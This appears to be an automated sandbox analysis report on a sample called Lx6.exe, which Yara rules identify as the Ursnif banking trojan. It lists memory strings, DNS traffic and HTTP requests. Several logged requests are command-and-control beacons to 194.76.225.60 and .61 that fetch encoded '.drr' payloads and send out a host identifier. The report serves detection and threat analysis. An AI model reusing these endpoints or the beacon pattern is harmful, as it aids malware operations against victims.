Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/logout.srf?ct=1665493297&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1665493296&rver=7.0.6730.0&w
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com/
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hoeren-heute.ch/d/horizon_reveal/?act=ACT0000044974ACT&utm_source=mcrs&utm_mediu
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hoeren-heute.ch/d/nulltarif_offer/?act=ACT0000045540ACT&utm_source=mcrs&utm_medi
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/finanzen/nachrichten/angebotsmieten-in-allen-kantonen-gestiegen/ar-AA12OUn
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/schweiz/ja-er-will-r%c3%b6sti-gibt-seine-kandidatur-bekannt/ar
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/news/other/bewaffnete-m%c3%a4nner-%c3%bcberfallen-luzerner-bar/ar-AA12NkUo
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/news/other/bundesratswahl-alle-augen-richten-sich-nach-bern/ar-AA12LMZu?oc
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/news/other/r%c3%a4uber-muss-nach-%c3%bcberfallserie-mehr-als-drei-jahre-in
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/news/other/wie-deine-abgeschnittenen-haare-seen-s%c3%a4ubern-k%c3%b6nnen/a
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/shopping
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/sport/other/fcz-bleibt-letzter-lugano-schl%c3%a4gt-basel-servette-und-luze
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/sport/other/z%c3%bcrich-und-winterthur-zeigten-wo-sie-stehen/ar-AA12LPId?o
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tippsundtricks.co/lifehacks/dose-offnen/?utm_campaign=DECH-Dose&utm_source=MSN&u
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tippsundtricks.co/lifehacks/dosenoeffner-falsch-benutzt/?utm_campaign=DECH-canopen&u
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tippsundtricks.co/saubermachen/reinige-dusche-spulmaschinentab/?utm_campaign=DECH-spulit
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tippsundtricks.co/sonstiges/diese-96-jahre-alte-dame-will-ihr-haus-verkaufen-wenn-du-dir

Source: unknown

DNS traffic detected: queries for: tel12.msn.com

Source: global traffic	HTTP traffic detected: GET /doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/BIhFC1DHq0NxSqN_2Fq5v/hicggKY4SgwJPP6D/F4xxZuIhTddt0HO/A_2B6u1ukXktqk9I1N/03tCA2eZF/F2lX7Km3UL6Oc40qXR7I/S_2Bu_2F1gAnwxNSHl_/2B_2BIw1VXdQgjLWDGSvzH/6KsVMipemRsxc/s39L4jXr/llySx2Z4YWz6hWH3fehvPN_/2B4i_2B9D9/MRxPcto8_2FTKi6Ul/Lo0znElngJCM/KVK8xvLBVm9/FogU94tV1Oz3NS/xOy9YP2f0yNELqTpaSapG/CGthTWmcja_2By_2/BWnMuFbG2_2/FigtxC.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.com
Source: global traffic	HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NTk3NzIzMjYsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NjE0OTA5OTMsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic	HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjMzNjk0MDQsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic	HTTP traffic detected: GET /doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Content-Length: 54Connection: Keep-AliveCache-Control: no-cacheData Raw: 31 31 2d 31 30 2d 32 30 32 32 20 31 35 3a 30 34 3a 32 35 20 7c 20 22 30 78 61 61 61 34 39 34 65 37 5f 36 33 31 34 63 64 34 36 63 34 66 66 35 22 20 7c 20 30 0d 0a Data Ascii: 11-10-2022 15:04:25 \| "0xaaa494e7_6314cd46c4ff5" \| 0

Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.225.60

Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="http://www.bing.com" /><link rel="preconnect" href="//browser.events.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="http://www.bing.com" /><link rel="dns-prefetch" href="//browser.events.data.msn.com" /><link rel="canonical" href="http://www.msn.com/de-ch/" /> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 79em)",size3column:"(min-width: 58.875em) and (max-width: 78.99em)",size2column:"(min-width: 43.75em) and (max-width: 58.865em)",size2rowsize4column:"(min-width: 79em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 58.875em) and (max-width: 78.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 58.865em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 79em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 58.875em) and (max-width: 78.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 58.865em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="http://www.msn.com/de-ch"/><meta property="og:url" content="http://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="http://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick{di

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
